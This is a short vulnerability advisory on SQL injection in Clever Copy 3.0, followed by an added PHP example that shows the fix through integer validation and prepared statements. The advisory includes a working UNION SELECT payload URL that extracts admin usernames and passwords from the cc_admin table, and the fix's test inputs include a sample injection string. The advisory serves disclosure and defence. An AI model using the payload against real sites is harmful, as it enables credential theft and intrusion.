source: http://www.securityfocus.com/bid/28437/info

Clever Copy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Clever Copy 3.0 is vulnerable; other versions may also be affected.

http://www.example.com/path/postview.php?ID='+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653ADA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/*
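
The mitigation for this class of flaw, as an added example that is not part of the original advisory and is not Clever Copy's own code: validate the ID parameter as a positive integer and bind it as a typed parameter instead of placing it in the query string. The posts table, its columns and the function names are assumptions; the in-memory SQLite data and the sample inputs are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical schema and function names; not Clever Copy's own code.

function parsePostId(mixed $raw): ?int
{
    // Accept only a plain positive decimal integer. Arrays (ID[]=...), quotes,
    // operators and comment markers are rejected before reaching the database.
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetchPost(PDO $db, int $id): ?array
{
    // The ID is bound as a typed parameter, so it is never parsed as SQL text.
    $stmt = $db->prepare('SELECT id, title FROM posts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database so this runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO posts (id, title) VALUES (1, 'First post')");

// Constructed inputs: a legitimate ID, a missing row, an array value, and a
// value shaped like the ID parameter in the request above.
$inputs = ['1', '42', ['1'], "' union select 1/*"];

foreach ($inputs as $raw) {
    $id = parsePostId($raw);
    if ($id === null) {
        // In a real handler this is where a 400 response would be returned.
        echo 'rejected: ', var_export($raw, true), PHP_EOL;
        continue;
    }
    $post = fetchPost($db, $id);
    echo $post === null ? "not found: id {$id}" : "found: {$post['title']}", PHP_EOL;
}
```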